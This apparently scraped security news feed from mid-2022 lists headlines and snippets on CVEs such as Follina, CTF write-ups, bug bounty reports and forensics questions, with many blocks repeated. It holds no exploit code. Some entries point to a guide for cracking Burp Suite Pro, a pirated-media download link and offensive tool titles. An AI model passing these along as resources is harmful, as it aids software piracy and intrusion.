    submitted by /u/0xDAV1D [link] [comments]
    OST2 Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities (Taught via explaining > 3 dozen CVEs from the last 3 years)
    submitted by /u/OpenSecurityTraining [link] [comments]
    Minerva's evasion based CTF is open for registration
    submitted by /u/woja111 [link] [comments]
  • Open

    Using Python to unearth a goldmine of threat intelligence from leaked chat logs
    submitted by /u/SCI_Rusher [link] [comments]
    GCP exploitation & lateral movement write up! - @securfreakazoid
    submitted by /u/securfreakazoid [link] [comments]
  • Open

    Enumeration and lateral movement in GCP environments
    This write up is about a pentest we did in which we managed to compromise a hybrid GCP hosted infrastructure using native GCP tools for… Continue reading on InfoSec Write-ups »
    Home-Grown Red Team: Using PhishPi For Captive Portal Evil Twin Attacks And Website Cloning
    A captive portal is one of the more interesting topics in the Wifi hacking arena. If you’re not familiar with what a captive portal is or… Continue reading on Medium »
  • Open

    Code Intelligence raises $12M to build dev-first advanced fuzzing solutions
    Article URL: https://www.code-intelligence.com/blog/series-a Comments URL: https://news.ycombinator.com/item?id=31584225 Points: 4 # Comments: 0
  • Open

    CVE-2022-23088 – FreeBSD Network Subsystem Remote Code Execution Vulnerability
    Article URL: https://www.freebsd.org/security/advisories/FreeBSD-SA-22:07.wifi_meshid.asc Comments URL: https://news.ycombinator.com/item?id=31583875 Points: 1 # Comments: 1
  • Open

    SecWiki News 2022-06-01 Review
    蓝牙协议对汽车安全的影响研究报告 by lxghost SCA的困境和出路 by ourren 图神经网络及认知推理总结和普及 by ourren SSL 指纹识别和绕过 by ourren APICraft: 为闭源的SDK库生成模糊的驱动程序 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-01 Review
    蓝牙协议对汽车安全的影响研究报告 by lxghost SCA的困境和出路 by ourren 图神经网络及认知推理总结和普及 by ourren SSL 指纹识别和绕过 by ourren APICraft: 为闭源的SDK库生成模糊的驱动程序 by ourren 更多最新文章,请访问SecWiki
  • Open

    浏览器自动化框架沦为攻击者的工具
    越来越多的威胁参与者正在使用免费的浏览器自动化框架作为其攻击活动的一部分。
    如何使用C2concealer生成随机化的C2 Malleable配置文件
    C2concealer是一款功能强大的命令行工具,可帮助广大研究人员可以轻松生成随机化的C2 Malleable配置文件。
    如何使用ShadowClone最大化云端服务的功能
    ShadowClone可以帮助我们充分利用云服务商提供的Free Tier,并极大程度地增强命令行工具的功能。
    物联网终端安全入门与实践之玩转物联网固件(上)
    本期我们将介绍物联网终端设备的固件获取方法、文件系统提取及分析技巧。
    FreeBuf早报 | 美发布公共研究数据库建设指南;诈骗分子利用俄乌冲突收集“善款”
    近日,美国白宫科技政策办公室(OSTP)发布了联邦资助研究数据库理想特征指南。
    go语言模糊测试(一):go-fuzz
    介绍关于go语言模糊测试工具go-fuzz的使用
    FreeBuf甲方群话题讨论 | 你有经历过威胁误报吗?
    面对大量的新增漏洞,应该如何从中筛选出真正有威胁的漏洞,做到快速、有效的判断识别,减少误报率?
    2021 Owasp top 10 逐个击破--A04:2021 – Insecure Design
    本文着重解读A02  Cryptographic Failures(加密机制失效)。
    微软MSDT零日漏洞上线CS
    据了解,该零日漏洞会影响多个Microsoft Office版本,包括Office、Office2016和Office 2021。
    悄无声息,Google已禁止Colab上的Deepfake项目
    有消息显示,Google已于近日悄悄禁止了其在 Colaboratory服务上的深度伪造(Deepfake)项目。
    通过DCERPC和ntlmssp获取Windows远程主机信息
    本文通过利用DCERPC协议的ping,附加NTLMSSP认证信息来获取windows远程主机的版本号等信息
    诈骗分子利用俄乌冲突,大肆收集“善款”
    FBI 发现诈骗分子冒充合法的乌克兰人道主义援助组织,以帮助乌克兰难民和战争受害者为由,收集捐款。
    摩诃草组织以巴基斯坦相关政府机构文件为诱饵的攻击活动分析
    背景摩诃草,又名Hangover、Patchwork、白象等,奇安信内部跟踪编号为APT-Q-36。
    数篷科技:助力数据全生命周期的零信任数据安全解决方案 | 网安新势力SOLO发布季
    企业安全如何应对环境带来的新挑战?网安新势力SOLO发布季告诉你!
    速看,微软MSDT零日漏洞的补丁来了
    5月30日,微软发布了相关的缓解措施,可阻止攻击者利用该零日漏洞发起远程攻击。
  • Open

    How I am winning battle with Windows 10 and 11 Security and avoiding detection
    No content preview
  • Open

    How I am winning battle with Windows 10 and 11 Security and avoiding detection
    No content preview
  • Open

    How I am winning battle with Windows 10 and 11 Security and avoiding detection
    No content preview

  • Open

    Tryhackme linuxloganalysis Writeup
    No content preview
    Tryhackme ramanalysis Writeup
    No content preview
    Tryhackme tsharkpcapanalysis Writeup
    No content preview
    SSO: A Secure way for authentication and authorization ?
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme Pcap Analysis Room Official Writeup
    No content preview
    HackThebox: Lame
    No content preview
    Erlik Machine Writeup
    No content preview
    Serial Communication with Raspberry Pi Pico in Windows 10/11 via WSL
    No content preview
    Top 5 Hacking Book , Must Read !!
    No content preview
    Persistent Windows 10 and 11 keylogger (keylogiq)
    No content preview
  • Open

    Tryhackme linuxloganalysis Writeup
    No content preview
    Tryhackme ramanalysis Writeup
    No content preview
    Tryhackme tsharkpcapanalysis Writeup
    No content preview
    SSO: A Secure way for authentication and authorization ?
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme Pcap Analysis Room Official Writeup
    No content preview
    HackThebox: Lame
    No content preview
    Erlik Machine Writeup
    No content preview
    Serial Communication with Raspberry Pi Pico in Windows 10/11 via WSL
    No content preview
    Top 5 Hacking Book , Must Read !!
    No content preview
    Persistent Windows 10 and 11 keylogger (keylogiq)
    No content preview
  • Open

    Tryhackme linuxloganalysis Writeup
    No content preview
    Tryhackme ramanalysis Writeup
    No content preview
    Tryhackme tsharkpcapanalysis Writeup
    No content preview
    SSO: A Secure way for authentication and authorization ?
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme Pcap Analysis Room Official Writeup
    No content preview
    HackThebox: Lame
    No content preview
    Erlik Machine Writeup
    No content preview
    Serial Communication with Raspberry Pi Pico in Windows 10/11 via WSL
    No content preview
    Top 5 Hacking Book , Must Read !!
    No content preview
    Persistent Windows 10 and 11 keylogger (keylogiq)
    No content preview
  • Open

    Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability
    CVE-2022-30190 enables remote code execution with the same privileges in the calling application and there are proof-of-concept examples of zero-click variants. We recommend protections and mitigations. The post Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability appeared first on Unit42.
    Network Security Trends: November 2021 to January 2022
    Network security trends observed November 2021 to January 2022 included high levels of cross-site scripting. The post Network Security Trends: November 2021 to January 2022 appeared first on Unit42.
  • Open

    Django debug enabled showing information about system, database, configuration files
    Glovo disclosed a bug submitted by omarelfarsaoui: https://hackerone.com/reports/1561377
    Deprecated owners.query API bypasses object view policy
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1584409 - Bounty: $300
    Able to bypass the fix on DOM XSS at [www.adobe.com]
    Adobe disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1398374
    DOM XSS on www.adobe.com
    Adobe disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1260825
    CSRF token validation system is disabled on Stripe Dashboard
    Stripe disclosed a bug submitted by rodolfomarianocy: https://hackerone.com/reports/1493437 - Bounty: $2500
    Improper input-size validation on the user new session name can result in server-side DDoS.
    Nextcloud disclosed a bug submitted by demonia: https://hackerone.com/reports/1153138 - Bounty: $100
    BlIND XSS on https://open.vanillaforums.com
    Vanilla disclosed a bug submitted by mohit0786: https://hackerone.com/reports/1189885 - Bounty: $300
    Self XSS in attachments name
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1536901
  • Open

    How Fuzzing helps me to get my first bounty?
    Hello Everyone, Continue reading on Medium »
    Astar Network Hosts a $1 million Bug Bounty Program on Immunefi
    05/31/2022 — We are launching a bug bounty program with Immunefi, Web3’s leading bug bounty platform, already protecting $100 billion in… Continue reading on Astar Network »
    From open redirect to RCE in one week
    I will tell you a story of how I chained multiple security issues to achieve RCE on several hosts of the Mail.Ru Group (or VK now). Continue reading on Medium »
    RootME: walkthrough
    Once again back with another story of hacking on the TryHackMe platform.The room this time a free room anyone can give it a try without a… Continue reading on Medium »
    Abusing Facebook’s feature for a permanent account confusion (logic vulnerability)
    TLDR; Logic vulnerability on Facebook led to half 2FA bypass/denial of service by locking users to login into the attacker’s controlled… Continue reading on Medium »
    SQL injection to Remote Command Execution (RCE)
    Hello hackers, before we get into it, I would like to know your view of this — between a hacker’s curiosity and instinct which would you… Continue reading on Medium »
    Price Parameter Tampering | How I Change Any Price on Website
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
    Web service-specific vulnerability scanners
    Vulnerability scanners are automated tools that crawl an application to identify the signatures of known vulnerabilities. Continue reading on Medium »
  • Open

    Unknown JS from Chrome Extension
    Found an unknown extension installed on a user's device that was loaded via a powershell script. JS is not my forte by any stretch of the imagination. Can anyone help me get an idea of what's happening here? Extension was loaded with this script set in the background. https://pastebin.com/p8sS0cye submitted by /u/phase [link] [comments]
    Threat Intel services with CAPEC or CWE classifications?
    I've recently been doing a lot of work with using threat intel feeds (which map threat activity to MITRE' ATT&CK TTPs) to support enterprise threat modeling. Wondering if it's possible to do the same with application threat modeling. Obviously, ATT&CK is not app-focused, so my current service (which only maps to ATT&CK) won't do the job. Does anybody know of any threat intel services that map threat activity to CAPEC or CWE classifications, for more granular app-level threat intel? submitted by /u/drstarskymrhutch [link] [comments]
    Are exe logged somewhere ?
    Is execution of programs (both in Program files and portable ones) logged somewhere in Windows ? Event viewer maybe ? Registry ? Other places ? I mean a default Windows 10 / 11 installation. Thanks for help submitted by /u/AnotherRedditUsr [link] [comments]
  • Open

    CVE-2022-21404: Another story of developers fixing vulnerabilities unknowingly because of CodeQL
    submitted by /u/cldrn [link] [comments]
    From open redirect to RCE in one week
    submitted by /u/smaury [link] [comments]
    How to use Atomic Red Team to test Falco rules in K8s
    submitted by /u/MiguelHzBz [link] [comments]
    Want to be a HVACker? Learn some new skills by exploiting security, fire, and HVAC systems
    submitted by /u/entropydaemon6 [link] [comments]
  • Open

    Nmap Post Port Scans | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/nmap04 Continue reading on Medium »
  • Open

    【安全通报】Microsoft Office 远程代码执行漏洞(CVE-2022...
    Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell...
  • Open

    【安全通报】Microsoft Office 远程代码执行漏洞(CVE-2022...
    Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell...
  • Open

    Questions about responsible disclosure
    I just found my first few vulnerabilities in a real world target, and I realize I don't really know how to properly disclose them to the vendor. The target is close source and it is a relatively large vendor so it isn't really clear how I should contact them. Any advice or standards about how I can determine who to contact? Also what is typically expected in body of the report? I'm planning on including a brief description of the vulnerabilities as well as a proof of concept and simple exploit. Is there anything else I should plan to include? Thanks in advance. submitted by /u/BinaryLuddite [link] [comments]
    Exploit Development Resources
    https://github.com/wtsxDev/Exploit-Development Share and Support! submitted by /u/saqfi [link] [comments]
  • Open

    High-Throughput, Formal-Methods-Assisted Fuzzing for LLVM
    Article URL: https://blog.regehr.org/archives/2148 Comments URL: https://news.ycombinator.com/item?id=31572268 Points: 3 # Comments: 0
  • Open

    War in Ukraine / May 30
    The military threat from Belarus remains Continue reading on Medium »
    Sakura Room OSINT CTF Writeup
    Here’s my writeup of the Sakura Room OSINT CTF by OSINT Dojo on TryHackMe, including solutions (spoiler alert!). Continue reading on Medium »
    Horse hunting: How we found Sofia Abramovich’s horses
    Insights from the Russian Asset Tracker project Continue reading on OCCRP: Unreported »
  • Open

    GCIH training materials
    Hi, can anyone recommend "external" (ie. not sans) training materials for GCIH for self study? Yes I know sans got their own books but if I could attend I would. Thnks in advance for not telling me how SANS is the only way. submitted by /u/Hot-Supermarket5177 [link] [comments]
  • Open

    SecWiki News 2022-05-31 Review
    Twitter 威胁情报跟踪与评估 by Avenger 浅谈Windows传统取证 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-31 Review
    Twitter 威胁情报跟踪与评估 by Avenger 浅谈Windows传统取证 by ourren 更多最新文章,请访问SecWiki
  • Open

    Killing The Bear - New actor added: BlackCat (a.k.a Alphv)
    New actor BlackCat (a.k.a Alphv - Noberus) added to 🐻 KillingTheBear 📙 https://killingthebear.jorgetesta.tech/actors/alphv It comes heavily loaded with TTPs and IOCs , processes, records, etc so SOC, CTI, Threat Hunting people take advantage and give it a try. Apart from the traditional sections, also added a timeline of victims and attacks. submitted by /u/J-Testa [link] [comments]
    Finding Main() with Ghidra
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    零日漏洞积极利用,或影响多个Microsoft Office版本
    近日,网络安全研究员nao_sec发现了一个从白俄罗斯上传至分析服务网站VirusTotal的恶意Word文档。
    FreeBuf早报 | FluBot恶意软件席卷欧洲;南非总统的个人信贷数据泄露
    黑客团伙SpiderLog$公开窃取了南非总统自2000年代在国内四大银行之一的贷款详细记录。
    利用腾讯云函数搭建免费代理池(搭建过程)
    最近听师傅有提到云函数搭建代理池能实现代理功能来隐藏ip,原理是利用云函数可以对外发包的功能再配合socks服务,这里记录一下搭建过程。
    WhatsApp 新骗局曝光,可劫持用户账户
    专家警告称,一个新的WhatsApp OTP 骗局正在被广泛利用,攻击者可以通过电话劫持用户的账户。
    匿名者声称将对白俄罗斯发起入侵
    匿名者黑客组织Spid3r声称攻击了白俄罗斯政府网站,以报复白俄罗斯支持俄罗斯入侵乌克兰。
  • Open

    DedeCMS 文件上传漏洞分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/tLyoN9JYRUAtOJTxWEP8DQ 0x01 前言 前段时间看到有篇文章是关于DedeCMS后台文件上传(CNVD-2022-33420),是绕过了对上传文件内容的黑名单过滤,碰巧前段时间学习过关于文件上传的知识,所以有了这篇文章,对DedeCMS的两个文件上传漏洞(CVE-2018-2012...
  • Open

    DedeCMS 文件上传漏洞分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/tLyoN9JYRUAtOJTxWEP8DQ 0x01 前言 前段时间看到有篇文章是关于DedeCMS后台文件上传(CNVD-2022-33420),是绕过了对上传文件内容的黑名单过滤,碰巧前段时间学习过关于文件上传的知识,所以有了这篇文章,对DedeCMS的两个文件上传漏洞(CVE-2018-2012...
  • Open

    technical specs and schematics for rocket engines
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of Brussels
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Computer Forensics and Digital Investigations Bachelor's degree question
    Hi all, I've been in the IT field for around 12 years, ranging from Scrum Master to Software Engineering Manager (where I've now been a few years). I've been completely fascinated by Computer Forensics though and would love to break into this area. For me, I learn best with structure so I prefer taking a formal program. Is anyone familiar with Champlain College? They have an online bachelor's degree in Computer Forensics and Digital Investigations that I've been looking into. Would love to hear any experience there, or recommendations for other programs! I'm going to continue working full time, so it's important that the program is online only. submitted by /u/anautumnsshade [link] [comments]
    Converting MAC images
    Can someone let me know how I can covert a MAC image (APFS) into E01? submitted by /u/Pepperknowsitall [link] [comments]
    Cellebrite Thumbnail Recovery
    Hello everyone, I have two questions regarding a Cellebrite extraction on an iPhone XR on the topic of thumbnails. What does the “access time” mean? Is this the time that the client accessed the photo throughout the day? What is a “creation time”? submitted by /u/ForsakenRKT [link] [comments]
  • Open

    Follina – a Microsoft Office code execution vulnerability
    Article URL: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=ab30e3e1bdaf Comments URL: https://news.ycombinator.com/item?id=31563980 Points: 1 # Comments: 0
    Follina – a Microsoft Office code execution vulnerability
    Article URL: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=13aa99ae48de Comments URL: https://news.ycombinator.com/item?id=31554823 Points: 1 # Comments: 0
  • Open

    Anyone know a good compliance rules matrix template?
    I am looking to organize all the regulatory compliance rules into one nice document to show here is all the different regulatory rules we need to follow. By implementing a solution for this or this we get this, this and this covered in these different compliance frameworks. I am thinking of how to show we are covering all the items from (ISO 27001, CIS, our 3416, Pipeda, OSFI ect..) I was thinking if there was a template for a raci or matrix of some kind that someone can point me to? or how do others track all of the regulations they need to follow and show they are following them? Any help is great. Thanks. submitted by /u/RecoverAdventurous12 [link] [comments]
    Are there any bootcamps or short-term/accelerated courses for a beginner to infosec that would actually help land a job?
    I've heard mostly negative-leaning mixed things about bootcamps, but right now I'm looking for something that will help me get an entry level infosec job without a 4-year degree (degree will come afterward, just need to be able to eat and sleep somewhere while I get it). I do very well with self-paced learning and I learn very quickly. I know that there are lots of resources for teaching yourself and I plan to utilize them, but I'm more concerned with getting some stamp on my resume to get my foot in the door. ​ e: For clarification - I'm less concerned with how effective the teaching is because I can learn on my own, I'm more concerned with it providing me with workplace-relevant things to learn/teach myself and with its prestige in landing a small-time role somewhere. submitted by /u/No_Manufacturer_4701 [link] [comments]
    Education
    I know of sans institute and WGU. They are awesome in which you can earn certs while you earn your degree. Are was wondering if there any other colleges/institutes that offer the same package? Currently located in Ohio. Price is not an issue for me due to G.I. Bill. I’m thinking of going with WGU in information tech bachelors and then going to sans for their masters. I have looked into Wright state for their computer science degree just not so sure due to the fact they don’t offer certs as you get your degree. submitted by /u/Particular-Fault9078 [link] [comments]
    Tool to find secrets in a text message
    We are looking for a tool to find secrets in a text message. The secrets could be AWS keys, Slack auth tokens, api tokens, etc. The text message are usually typed by the user or they might copy past some configuration files which can contain secrets. I looked at a few tools like semgrep, gitleaks, they work on source files or github repositories. But i need some tool that accepts a text message and returns the result. Thanks in advance. submitted by /u/kmkanagaraj [link] [comments]
  • Open

    UPnProxyChain: a Tool to Exploit Devices Vulnerable to UPnProxy
    submitted by /u/Salmiakkilakritsi [link] [comments]
    New Zero-Day Code Execution Vulnerability In MS Office - Follina
    submitted by /u/sciencestudent99 [link] [comments]
    Mass account takeover in Yunmai smartscale API (full disclosure)
    submitted by /u/adrian_rt [link] [comments]
    Offensive Windows IPC Internals 3: ALPC
    submitted by /u/0xdea [link] [comments]
  • Open

    PicoCTF Review
    Hi! Guys I’m back with a new blog and I’m so excited because with this site you can learn a LOT! Continue reading on Medium »
    How to Crack & Install BurpSuite Professional in Kali Linux
    Steps to crack & Install Burpsuite Pro in Kali-Linux Continue reading on Medium »
    Top 5 Hacking Book , Must Read !!
    A Hacking and cybersecurity books guide which tells you about top 10 Hacking books . Continue reading on InfoSec Write-ups »
    How to find & access Admin Panel by digging into JS files…
    Hello All,🙂 Continue reading on Medium »
    How I found my first ever XSS on a website.
    So, I have been into web hacking lately. While into it, I have explored bug bounties but never found a bug in real website. I have tested… Continue reading on Medium »
    Introducing Melos Bug Bounty Program
    We’re happy to see how quickly Melos Studio has grown so far, but with that comes some concerns. We have seen many recent crises and fraud… Continue reading on Medium »
    Web application hacking methodology
    Systematic and goal-oriented penetration testing always starts with the right methodology. The following diagram shows how web application… Continue reading on Medium »
    Account Takeover Via Rxss Post
    Hello There, My Name is Aryan From Kurdistan, Bug Hunter in Hackerone with Experience 6 Months Also I Student in university, Forgive me… Continue reading on Medium »
  • Open

    War in Ukraine / May 27–29
    Slowing down the pressure of sanctions Continue reading on Medium »
    Hack Hydra co-owner’s crypto wallet
    A Moscow court can confiscate a record amount for Russia from a drug dealer’s crypto wallet, but he does not give the password. We are… Continue reading on Medium »
    Don’t Rely on Tools — OSINT Challenge 24
    Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out where it was taken… Continue reading on Medium »
    Hunting Usernames With Sherlock
    Learn how to use sherlock, a powerful command line OSINT tool used for hunting down usernames across social networks. Continue reading on Medium »
  • Open

    WEB-DLs and Remuxes of Movies and Series
    http://195.154.231.76/mteam/269573/ submitted by /u/GrowAsguard [link] [comments]
  • Open

    SecWiki News 2022-05-30 Review
    SecWiki周刊(第430期) by ourren 恶意npm包的自动化挖掘方法 by ourren 诈骗知名门户的黑产团伙溯源分析 by ourren 搜狐中招钓鱼邮件诈骗的技术和基础设施分析 by ourren RSAC 2022 – 创新沙盒观感 (1) by ourren PE文件结构解析3 by SecIN社区 Artillery: JAVA 插件化漏洞扫描器 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-30 Review
    SecWiki周刊(第430期) by ourren 恶意npm包的自动化挖掘方法 by ourren 诈骗知名门户的黑产团伙溯源分析 by ourren 搜狐中招钓鱼邮件诈骗的技术和基础设施分析 by ourren RSAC 2022 – 创新沙盒观感 (1) by ourren PE文件结构解析3 by SecIN社区 Artillery: JAVA 插件化漏洞扫描器 by ourren 更多最新文章,请访问SecWiki
  • Open

    The Art of Fuzzing (2017) [pdf]
    Article URL: https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2017_11/the_art_of_fuzzing_slides.pdf Comments URL: https://news.ycombinator.com/item?id=31559280 Points: 2 # Comments: 0
  • Open

    FreeBuf早报 | Android 预装应用受高危漏洞影响;FluBot 移动恶意软件席卷欧洲
    微软披露了在 mce Systems 提供的 Android Apps 移动服务框架中的严重安全漏洞,多个运营商的默认预装应用受影响。
    互联网金融企业DevSecOps落地实践 | FreeBuf甲方社群直播回顾
    互金企业安全从业者柳伟杰在FreeBuf甲方社群第四场内部直播中担任主讲嘉宾,向大家分享互联网金融企业DevSecOps落地实践。
    信安标委发布《信息安全技术 互联网平台及产品服务隐私协议要求》(征求意见稿)
    《征求意见稿》规定互联网平台及产品服务隐私协议编制程序、具体内容、发布形式,增加隐私协议的可读性、透明性,以及处理隐私协议相关的争议纠纷等。
    警惕!KillNet恐于5月30日对意大利发动大规模攻击
    亲俄黑客组织KillNet于5月30日对意大利政府发出威胁,称将对其发动史无前例的大规模攻击。
    EnemyBot恶意软件增加了针对VMware等关键漏洞的攻击
    EnemyBot背后的组织Keksec正在积极开发该恶意软件。
    微软发现Android 预装应用受高危漏洞影响
    微软安全研究团队披露了在 mce Systems 提供的 Android Apps 移动服务框架中的严重安全漏洞,多个运营商的默认预装应用受影响。
    非法获利5.68亿美元,37岁欺诈者被判四年
    Telusma因在跨国网络犯罪组织运营的Infraud卡片门户上出售、使用被盗和受损信用卡、个人信息、财务信息而被判处四年有期徒刑。
    路透社:英国脱欧泄密网站幕后推手与俄罗斯黑客有关
    “Very English Coop d'Etat”网站的设立是为了发布英国脱欧支持者的私人电子邮件。
    世融能量:量子密码和安全密不可分 | 网安新势力SOLO发布季
    量子技术如何应用于安全领域?网安新势力大会SOLO发布季告诉你!
  • Open

    Users who are restricted to use the application because of a "Waiting List" are able to get access to the Beta Application by bypassing the waitlist
    Alohi disclosed a bug submitted by darkknight4688: https://hackerone.com/reports/1494308
  • Open

    Pen #004: Linux Basics (Part 1)
    No content preview
    AWS IAM Exploitation Techniques
    No content preview
    Anatomy Of Spring4Shell CVE-2022–22965
    No content preview
  • Open

    Pen #004: Linux Basics (Part 1)
    No content preview
    AWS IAM Exploitation Techniques
    No content preview
    Anatomy Of Spring4Shell CVE-2022–22965
    No content preview
  • Open

    Pen #004: Linux Basics (Part 1)
    No content preview
    AWS IAM Exploitation Techniques
    No content preview
    Anatomy Of Spring4Shell CVE-2022–22965
    No content preview
  • Open

    Active Directory Purple Teaming
    This repository is aimed at sharing the cliff notes for performing Red Teaming of Active Directory System combined with Detection… Continue reading on Medium »

  • Open

    What are the Implications of an automation tool, using PsExec to execute commands (of any kind) on client machines, from a domain controller?
    I use ConnectwiseAutomate (CWA) to manage my environment. Today I was parsing through Sysmon logs, and found that CWA is using PsExec, to execute commands on client machines, from my domain controller. The commands I've seen it execute are benign in general. And seem to be "normal/built-in" processes (because they're not any i created) But it makes me uncomfortable that this is happening in general. (I've already created a post asking how to stop CWA from doing this.) It makes me uncomfortable because I go out of my way to practice principal of least privilege. As I'm generally aware of PTH attacks and similar. e.g., I never log onto member servers or workstations as domain admin. I have separate accounts for the administration of standard member servers ( in other words, non-do…
    Home Server
    Hey everyone, I woulk like to set a home server in a raspberry pie 400 or even an older computer. Do you know any step by step guide for a novice person to start with? A OS GUI is mandatory. Thanks in advance submitted by /u/fmsferreira [link] [comments]
  • Open

    CRYPTOCURRENCY OSINT
    submitted by /u/saqfi [link] [comments]
    GitHub - Orange-Cyberdefense/arsenal: Arsenal is just a quick inventory and launcher for hacking programs
    submitted by /u/saqfi [link] [comments]
    JPG to Malware
    submitted by /u/saqfi [link] [comments]
    ForceAdmin : Create infinate #UAC prompts forcing a user to run as admin.
    submitted by /u/saqfi [link] [comments]
    grsecurity - Tetragone: A Lesson in Security Fundamentals
    submitted by /u/buherator [link] [comments]
  • Open

    P3 Bug in Just 2 Minute
    Hey Hello, Security guys & Hacker Thank you for your support. Continue reading on Medium »
    DOMAIN ADMIN Compromise in 3 HOURS
    Hi everyone; I hope you enjoyed my previous blog post on “How I obtained Admin access in 30 minutes” — so today I am bringing you another… Continue reading on Medium »
    Biblioteca Walkthrough:THM
    In the past few days, I am recharging myself by trying my hands at different rooms present in tryhackme TryHackMe. So thought why not just… Continue reading on Medium »
    Hall of Fame Vice Media ? hacking while sleepy…
    Hello guys, actually this is the case in 2021 but only now had time to write. So… have you ever heard of Vice media? one of the largest… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Lo stile (interdisciplinare) di OSINT
    Sapete già — vi ho già assillato abbastanza in passato — che uno dei pilastri della mia proposta di Teoria Generale per l’Intelligence… Continue reading on Medium »
    SPY NEWS: 2022 — Week 21
    Summary of the espionage-related news stories for the Week 21 (22–29 May) of 2022. Continue reading on Medium »
    Video verification: Sent to Chinese quarantine camp
    Video verification article on footage showing Chinese citizens sent off to quarantine camps #OSINT #verification by @Techjournalisto Continue reading on Medium »
  • Open

    DOMAIN ADMIN Compromise in 3 HOURS
    Hi everyone; I hope you enjoyed my previous blog post on “How I obtained Admin access in 30 minutes” — so today I am bringing you another… Continue reading on Medium »
  • Open

    CYBERSOC Information Technology Library Blog
    submitted by /u/cybersocdm [link] [comments]
    Killing The Bear - Cybercrime repo, Threat Actors, Campaigns, Malware, IOCs
    ​ Killing The Bear Hi everyone! I want to share with you my new gitbook/repo about Threat Actors: Killing The Bear. Very useful for SOC, CTI and Threat Hunting teams. In it you can find: - Threat Actors - Malware - Tools - TTPs - IOCs - Summary (executive) - Wallets - Timeline - Relationships - Etc... Yesterday I published the "Killnet" category, you can find it here: Killnet - Actor Gradually more categories are being added with more intel. I hope it will be useful to you or your team. Thank you! submitted by /u/J-Testa [link] [comments]
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Hacking GraphQL — Part 1
    No content preview
    Bypass the Firewall with SSH Tunnelling
    No content preview
    CyberStarters CTF — Gunship
    No content preview
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Hacking GraphQL — Part 1
    No content preview
    Bypass the Firewall with SSH Tunnelling
    No content preview
    CyberStarters CTF — Gunship
    No content preview
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Hacking GraphQL — Part 1
    No content preview
    Bypass the Firewall with SSH Tunnelling
    No content preview
    CyberStarters CTF — Gunship
    No content preview
  • Open

    Heap BINARY EXPLOITATION w/ Matt E! (Tcache Attack)
    submitted by /u/soupcreamychicken [link] [comments]
    REcon is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada.
    https://recon.cx/ submitted by /u/soupcreamychicken [link] [comments]
  • Open

    FreeBuf早报 | 淘宝禁售修改伪造IP等软件与服务;曝通用汽车受黑客攻击
    淘宝平台发布《淘宝平台违禁信息管理规则》,明确禁止销售IP修改/代理/伪造的软件及服务。此次规则变更将于2022年6月3日正式生效。
    逻辑越权漏洞
    部分内容来自这篇,仅作为自己学习的记录还有跟着迪总所学水平越权和垂直越权概述水平越权:指攻击者尝试访问与他拥有相同权限的用户资源。垂直越权:低权限用户尝试访问高权限用户的资源。(例如一个用户的个人信息管理页是 user.php,而管理员管理所有用户信息的页面是 manageuser.php, 但管理页面没有相关的权限验证,导致任何人输入管理页面地址都可以访问)漏洞产生原因越权漏洞形成的原因是后台使
  • Open

    My Photo Investigation Toolkit
    Search by photo Extracting metadata Photoforensic tools Fact-checking tools https://start.me/p/0PgzqO/photo-osint Bye submitted by /u/saqfi [link] [comments]
    Sans Memory forensic Cheat Sheet
    https://github.com/AndrewRathbun/DFIRMindMaps/tree/main/MemoryForensics/SANSMemoryForensicsCheatSheet Complete Cheatsheet submitted by /u/saqfi [link] [comments]
  • Open

    A security vulnerability in Git that can lead to arbitrary code execution (2018)
    Article URL: https://devblogs.microsoft.com/devops/announcing-the-may-2018-git-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31547175 Points: 1 # Comments: 0

  • Open

    Vulnerable machines for learning
    Are there any vulnerable systems for learning, specifically API? I’ve seen everything but. But figure there has to be some? submitted by /u/networkalchemy [link] [comments]
    Advice On Hashcat Not Detecting AMD GPU
